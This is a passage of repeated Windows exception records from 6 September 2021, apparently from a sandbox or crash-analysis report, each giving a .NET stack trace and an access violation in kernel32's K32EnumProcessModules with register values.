0x773b011a system+0x1ebc85 @ 0x6dadbc85 system+0x1f683b @ 0x6dae683b system+0x1a5e44 @ 0x6da95e44 system+0x1fd8a0 @ 0x6daed8a0 system+0x1fd792 @ 0x6daed792 system+0x1a14bd @ 0x6da914bd 0x71116a DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x70562652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7057264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x70572e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x706274ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x70627610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x706b1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x706b1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x706b1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x706b416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d6f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b17f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b14de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 89 04 91 c7 45 fc fe ff ff ff ff 45 10 81 7d 10 exception.symbol: K32EnumProcessModules+0x113 RegisterApplicationRestart-0xc3 kernel32+0x3b479 exception.instruction: mov dword ptr [ecx + edx*4], eax exception.module: KERNEL32.dll exception.exception_code: 0xc0000005 exception.offset: 242809 exception.address: 0x7575b479 registers.esp: 3728960 registers.edi: 1990713288 registers.eax: 4194304 registers.ebp: 3729164 registers.edx: 0 registers.ebx: 0 registers.esi: 1 registers.ecx: 0	1
__exception__ Sept. 6, 2021, 6:20 p.m.	stacktrace: K32EnumProcessModules+0x18 RegisterApplicationRestart-0x1be kernel32+0x3b37e @ 0x7575b37e 0x6ed5dfd 0x6ed5d72 0x6ed35c1 0x6ed2edb 0x6ed13ac 0x21a0f97 system+0x1d3f63 @ 0x6d413f63 0x71eccc 0x71e08b system+0x19c522 @ 0x6da8c522 system+0x19e920 @ 0x6da8e920 system+0x19e803 @ 0x6da8e803 0x71175e system+0x1f9799 @ 0x6dae9799 system+0x1f92c8 @ 0x6dae92c8 system+0x1eca74 @ 0x6dadca74 system+0x1ec868 @ 0x6dadc868 system+0x1f82b8 @ 0x6dae82b8 system+0x1ee54d @ 0x6dade54d system+0x1f70ea @ 0x6dae70ea system+0x1e56c0 @ 0x6dad56c0 system+0x1f8215 @ 0x6dae8215 system+0x1f6f75 @ 0x6dae6f75 system+0x1ee251 @ 0x6dade251 system+0x1ee229 @ 0x6dade229 system+0x1ee170 @ 0x6dade170 0x57a08e gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x755b6de8 GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x755b6e44 KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x773b011a system+0x1ebc85 @ 0x6dadbc85 system+0x1f683b @ 0x6dae683b system+0x1a5e44 @ 0x6da95e44 system+0x1fd8a0 @ 0x6daed8a0 system+0x1fd792 @ 0x6daed792 system+0x1a14bd @ 0x6da914bd 0x71116a DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x70562652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7057264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x70572e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x706274ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x70627610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x706b1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x706b1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x706b1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x706b416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d6f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b17f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b14de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 89 04 91 c7 45 fc fe ff ff ff ff 45 10 81 7d 10 exception.symbol: K32EnumProcessModules+0x113 RegisterApplicationRestart-0xc3 kernel32+0x3b479 exception.instruction: mov dword ptr [ecx + edx*4], eax exception.module: KERNEL32.dll exception.exception_code: 0xc0000005 exception.offset: 242809 exception.address: 0x7575b479 registers.esp: 3728960 registers.edi: 1990713288 registers.eax: 13369344 registers.ebp: 3729164 registers.edx: 0 registers.ebx: 0 registers.esi: 1 registers.ecx: 0	1
__exception__ Sept. 6, 2021, 6:20 p.m.	stacktrace: K32EnumProcessModules+0x18 RegisterApplicationRestart-0x1be kernel32+0x3b37e @ 0x7575b37e 0x6ed5dfd 0x6ed5d72 0x6ed35c1 0x6ed2edb 0x6ed13ac 0x21a0f97 system+0x1d3f63 @ 0x6d413f63 0x71eccc 0x71e08b system+0x19c522 @ 0x6da8c522 system+0x19e920 @ 0x6da8e920 system+0x19e803 @ 0x6da8e803 0x71175e system+0x1f9799 @ 0x6dae9799 system+0x1f92c8 @ 0x6dae92c8 system+0x1eca74 @ 0x6dadca74 system+0x1ec868 @ 0x6dadc868 system+0x1f82b8 @ 0x6dae82b8 system+0x1ee54d @ 0x6dade54d system+0x1f70ea @ 0x6dae70ea system+0x1e56c0 @ 0x6dad56c0 system+0x1f8215 @ 0x6dae8215 system+0x1f6f75 @ 0x6dae6f75 system+0x1ee251 @ 0x6dade251 system+0x1ee229 @ 0x6dade229 system+0x1ee170 @ 0x6dade170 0x57a08e gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x755b6de8 GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x755b6e44 KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x773b011a system+0x1ebc85 @ 0x6dadbc85 system+0x1f683b @ 0x6dae683b system+0x1a5e44 @ 0x6da95e44 system+0x1fd8a0 @ 0x6daed8a0 system+0x1fd792 @ 0x6daed792 system+0x1a14bd @ 0x6da914bd 0x71116a DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x70562652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7057264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x70572e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x706274ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x70627610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x706b1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x706b1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x706b1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x706b416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d6f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b17f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b14de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 89 04 91 c7 45 fc fe ff ff ff ff 45 10 81 7d 10 exception.symbol: K32EnumProcessModules+0x113 RegisterApplicationRestart-0xc3 kernel32+0x3b479 exception.instruction: mov dword ptr [ecx + edx*4], eax exception.module: KERNEL32.dll exception.exception_code: 0xc0000005 exception.offset: 242809 exception.address: 0x7575b479 registers.esp: 3728960 registers.edi: 1990713288 registers.eax: 15663104 registers.ebp: 3729164 registers.edx: 0 registers.ebx: 0 registers.esi: 1 registers.ecx: 0	1
__exception__ Sept. 6, 2021, 6:20 p.m.	stacktrace: K32EnumProcessModules+0x18 RegisterApplicationRestart-0x1be kernel32+0x3b37e @ 0x7575b37e 0x6fd2d75 0x6fd2cea 0x6fd08e3 0x752f32b 0x752e2a3 0x20d0f97 system+0x1d3f63 @ 0x6ea23f63 0x85dd4d 0x85d175 system+0x19c522 @ 0x6bccc522 system+0x19e920 @ 0x6bcce920 system+0x19e803 @ 0x6bcce803 0x850449 system+0x1f9799 @ 0x6bd29799 system+0x1f92c8 @ 0x6bd292c8 system+0x1eca74 @ 0x6bd1ca74 system+0x1ec868 @ 0x6bd1c868 system+0x1f82b8 @ 0x6bd282b8 system+0x1ee54d @ 0x6bd1e54d system+0x1f70ea @ 0x6bd270ea system+0x1e56c0 @ 0x6bd156c0 system+0x1f8215 @ 0x6bd28215 system+0x1f6f75 @ 0x6bd26f75 system+0x1ee251 @ 0x6bd1e251 system+0x1ee229 @ 0x6bd1e229 system+0x1ee170 @ 0x6bd1e170 0x57a08e gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x755b6de8 GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x755b6e44 KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x773b011a system+0x1ebc85 @ 0x6bd1bc85 system+0x1f683b @ 0x6bd2683b system+0x1a5e44 @ 0x6bcd5e44 system+0x1fd8a0 @ 0x6bd2d8a0 system+0x1fd792 @ 0x6bd2d792 system+0x1a14bd @ 0x6bcd14bd 0x850084 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fec2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fed264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fed2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6ff874ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6ff87610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x70011dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x70011e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x70011f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7001416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72957f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72954de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 89 04 91 c7 45 fc fe ff ff ff ff 45 10 81 7d 10 exception.symbol: K32EnumProcessModules+0x113 RegisterApplicationRestart-0xc3 kernel32+0x3b479 exception.instruction: mov dword ptr [ecx + edx*4], eax exception.module: KERNEL32.dll exception.exception_code: 0xc0000005 exception.offset: 242809 exception.address: 0x7575b479 registers.esp: 2811856 registers.edi: 1990713288 registers.eax: 16777216 registers.ebp: 2812060 registers.edx: 0 registers.ebx: 0 registers.esi: 1 registers.ecx: 0	1
__exception__ Sept. 6, 2021, 6:20 p.m.	stacktrace: K32EnumProcessModules+0x18 RegisterApplicationRestart-0x1be kernel32+0x3b37e @ 0x7575b37e 0x6fd2d75 0x6fd2cea 0x6fd08e3 0x752f32b 0x752e2a3 0x20d0f97 system+0x1d3f63 @ 0x6ea23f63 0x85dd4d 0x85d175 system+0x19c522 @ 0x6bccc522 system+0x19e920 @ 0x6bcce920 system+0x19e803 @ 0x6bcce803 0x850449 system+0x1f9799 @ 0x6bd29799 system+0x1f92c8 @ 0x6bd292c8 system+0x1eca74 @ 0x6bd1ca74 system+0x1ec868 @ 0x6bd1c868 system+0x1f82b8 @ 0x6bd282b8 system+0x1ee54d @ 0x6bd1e54d system+0x1f70ea @ 0x6bd270ea system+0x1e56c0 @ 0x6bd156c0 system+0x1f8215 @ 0x6bd28215 system+0x1f6f75 @ 0x6bd26f75 system+0x1ee251 @ 0x6bd1e251 system+0x1ee229 @ 0x6bd1e229 system+0x1ee170 @ 0x6bd1e170 0x57a08e gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x755b6de8 GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x755b6e44 KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x773b011a system+0x1ebc85 @ 0x6bd1bc85 system+0x1f683b @ 0x6bd2683b system+0x1a5e44 @ 0x6bcd5e44 system+0x1fd8a0 @ 0x6bd2d8a0 system+0x1fd792 @ 0x6bd2d792 system+0x1a14bd @ 0x6bcd14bd 0x850084 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fec2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fed264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fed2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6ff874ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6ff87610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x70011dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x70011e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x70011f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7001416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72957f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72954de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 89 04 91 c7 45 fc fe ff ff ff ff 45 10 81 7d 10 exception.symbol: K32EnumProcessModules+0x113 RegisterApplicationRestart-0xc3 kernel32+0x3b479 exception.instruction: mov dword ptr [ecx + edx*4], eax exception.module: KERNEL32.dll exception.exception_code: 0xc0000005 exception.offset: 242809 exception.address: 0x7575b479 registers.esp: 2811856 registers.edi: 1990713288 registers.eax: 4194304 registers.ebp: 2812060 registers.edx: 0 registers.ebx: 0 registers.esi: 1 registers.ecx: 0	1
__exception__ Sept. 6, 2021, 6:20 p.m.	stacktrace: K32EnumProcessModules+0x18 RegisterApplicationRestart-0x1be kernel32+0x3b37e @ 0x7575b37e 0x6fd2d75 0x6fd2cea 0x6fd08e3 0x752f32b 0x752e2a3 0x20d0f97 system+0x1d3f63 @ 0x6ea23f63 0x85dd4d 0x85d175 system+0x19c522 @ 0x6bccc522 system+0x19e920 @ 0x6bcce920 system+0x19e803 @ 0x6bcce803 0x850449 system+0x1f9799 @ 0x6bd29799 system+0x1f92c8 @ 0x6bd292c8 system+0x1eca74 @ 0x6bd1ca74 system+0x1ec868 @ 0x6bd1c868 system+0x1f82b8 @ 0x6bd282b8 system+0x1ee54d @ 0x6bd1e54d system+0x1f70ea @ 0x6bd270ea system+0x1e56c0 @ 0x6bd156c0 system+0x1f8215 @ 0x6bd28215 system+0x1f6f75 @ 0x6bd26f75 system+0x1ee251 @ 0x6bd1e251 system+0x1ee229 @ 0x6bd1e229 system+0x1ee170 @ 0x6bd1e170 0x57a08e gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x755b6de8 GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x755b6e44 KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x773b011a system+0x1ebc85 @ 0x6bd1bc85 system+0x1f683b @ 0x6bd2683b system+0x1a5e44 @ 0x6bcd5e44 system+0x1fd8a0 @ 0x6bd2d8a0 system+0x1fd792 @ 0x6bd2d792 system+0x1a14bd @ 0x6bcd14bd 0x850084 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fec2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fed264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fed2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6ff874ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6ff87610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x70011dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x70011e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x70011f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7001416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72957f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72954de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 89 04 91 c7 45 fc fe ff ff ff ff 45 10 81 7d 10 exception.symbol: K32EnumProcessModules+0x113 RegisterApplicationRestart-0xc3 kernel32+0x3b479 exception.instruction: mov dword ptr [ecx + edx*4], eax exception.module: KERNEL32.dll exception.exception_code: 0xc0000005 exception.offset: 242809 exception.address: 0x7575b479 registers.esp: 2811856 registers.edi: 1990713288 registers.eax: 4194304 registers.ebp: 2812060 registers.edx: 0 registers.ebx: 0 registers.esi: 1 registers.ecx: 0	1
__exception__ Sept. 6, 2021, 6:20 p.m.	stacktrace: K32EnumProcessModules+0x18 RegisterApplicationRestart-0x1be kernel32+0x3b37e @ 0x7575b37e 0x6fd2d75 0x6fd2cea 0x6fd08e3 0x752f32b 0x752e2a3 0x20d0f97 system+0x1d3f63 @ 0x6ea23f63 0x85dd4d 0x85d175 system+0x19c522 @ 0x6bccc522 system+0x19e920 @ 0x6bcce920 system+0x19e803 @ 0x6bcce803 0x850449 system+0x1f9799 @ 0x6bd29799 system+0x1f92c8 @ 0x6bd292c8 system+0x1eca74 @ 0x6bd1ca74 system+0x1ec868 @ 0x6bd1c868 system+0x1f82b8 @ 0x6bd282b8 system+0x1ee54d @ 0x6bd1e54d system+0x1f70ea @ 0x6bd270ea system+0x1e56c0 @ 0x6bd156c0 system+0x1f8215 @ 0x6bd28215 system+0x1f6f75 @ 0x6bd26f75 system+0x1ee251 @ 0x6bd1e251 system+0x1ee229 @ 0x6bd1e229 system+0x1ee170 @ 0x6bd1e170 0x57a08e gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x755b6de8 GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x755b6e44 KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x773b011a system+0x1ebc85 @ 0x6bd1bc85 system+0x1f683b @ 0x6bd2683b system+0x1a5e44 @ 0x6bcd5e44 system+0x1fd8a0 @ 0x6bd2d8a0 system+0x1fd792 @ 0x6bd2d792 system+0x1a14bd @ 0x6bcd14bd 0x850084 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fec2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fed264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fed2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6ff874ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6ff87610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x70011dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x70011e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x70011f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7001416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72957f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72954de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 89 04 91 c7 45 fc fe ff ff ff ff 45 10 81 7d 10 exception.symbol: K32EnumProcessModules+0x113 RegisterApplicationRestart-0xc3 kernel32+0x3b479 exception.instruction: mov dword ptr [ecx + edx*4], eax exception.module: KERNEL32.dll exception.exception_code: 0xc0000005 exception.offset: 242809 exception.address: 0x7575b479 registers.esp: 2811856 registers.edi: 1990713288 registers.eax: 9306112 registers.ebp: 2812060 registers.edx: 0 registers.ebx: 0 registers.esi: 1 registers.ecx: 0	1
__exception__ Sept. 6, 2021, 6:20 p.m.	stacktrace: K32EnumProcessModules+0x18 RegisterApplicationRestart-0x1be kernel32+0x3b37e @ 0x7575b37e 0x6fd2d75 0x6fd2cea 0x6fd08e3 0x752f32b 0x752e2a3 0x20d0f97 system+0x1d3f63 @ 0x6ea23f63 0x85dd4d 0x85d175 system+0x19c522 @ 0x6bccc522 system+0x19e920 @ 0x6bcce920 system+0x19e803 @ 0x6bcce803 0x850449 system+0x1f9799 @ 0x6bd29799 system+0x1f92c8 @ 0x6bd292c8 system+0x1eca74 @ 0x6bd1ca74 system+0x1ec868 @ 0x6bd1c868 system+0x1f82b8 @ 0x6bd282b8 system+0x1ee54d @ 0x6bd1e54d system+0x1f70ea @ 0x6bd270ea system+0x1e56c0 @ 0x6bd156c0 system+0x1f8215 @ 0x6bd28215 system+0x1f6f75 @ 0x6bd26f75 system+0x1ee251 @ 0x6bd1e251 system+0x1ee229 @ 0x6bd1e229 system+0x1ee170 @ 0x6bd1e170 0x57a08e gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x755b6de8 GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x755b6e44 KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x773b011a system+0x1ebc85 @ 0x6bd1bc85 system+0x1f683b @ 0x6bd2683b system+0x1a5e44 @ 0x6bcd5e44 system+0x1fd8a0 @ 0x6bd2d8a0 system+0x1fd792 @ 0x6bd2d792 system+0x1a14bd @ 0x6bcd14bd 0x850084 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fec2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fed264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fed2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6ff874ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6ff87610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x70011dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x70011e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x70011f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7001416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72957f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72954de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 89 04 91 c7 45 fc fe ff ff ff ff 45 10 81 7d 10 exception.symbol: K32EnumProcessModules+0x113 RegisterApplicationRestart-0xc3 kernel32+0x3b479 exception.instruction: mov dword ptr [ecx + edx*4], eax exception.module: KERNEL32.dll exception.exception_code: 0xc0000005 exception.offset: 242809 exception.address: 0x7575b479 registers.esp: 2811856 registers.edi: 1990713288 registers.eax: 1244725248 registers.ebp: 2812060 registers.edx: 0 registers.ebx: 0 registers.esi: 1 registers.ecx: 0	1
__exception__ Sept. 6, 2021, 6:20 p.m.	stacktrace: K32EnumProcessModules+0x18 RegisterApplicationRestart-0x1be kernel32+0x3b37e @ 0x7575b37e 0x6fd2d75 0x6fd2cea 0x6fd08e3 0x752f32b 0x752e2a3 0x20d0f97 system+0x1d3f63 @ 0x6ea23f63 0x85dd4d 0x85d175 system+0x19c522 @ 0x6bccc522 system+0x19e920 @ 0x6bcce920 system+0x19e803 @ 0x6bcce803 0x850449 system+0x1f9799 @ 0x6bd29799 system+0x1f92c8 @ 0x6bd292c8 system+0x1eca74 @ 0x6bd1ca74 system+0x1ec868 @ 0x6bd1c868 system+0x1f82b8 @ 0x6bd282b8 system+0x1ee54d @ 0x6bd1e54d system+0x1f70ea @ 0x6bd270ea system+0x1e56c0 @ 0x6bd156c0 system+0x1f8215 @ 0x6bd28215 system+0x1f6f75 @ 0x6bd26f75 system+0x1ee251 @ 0x6bd1e251 system+0x1ee229 @ 0x6bd1e229 system+0x1ee170 @ 0x6bd1e170 0x57a08e gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x755b6de8 GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x755b6e44 KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a 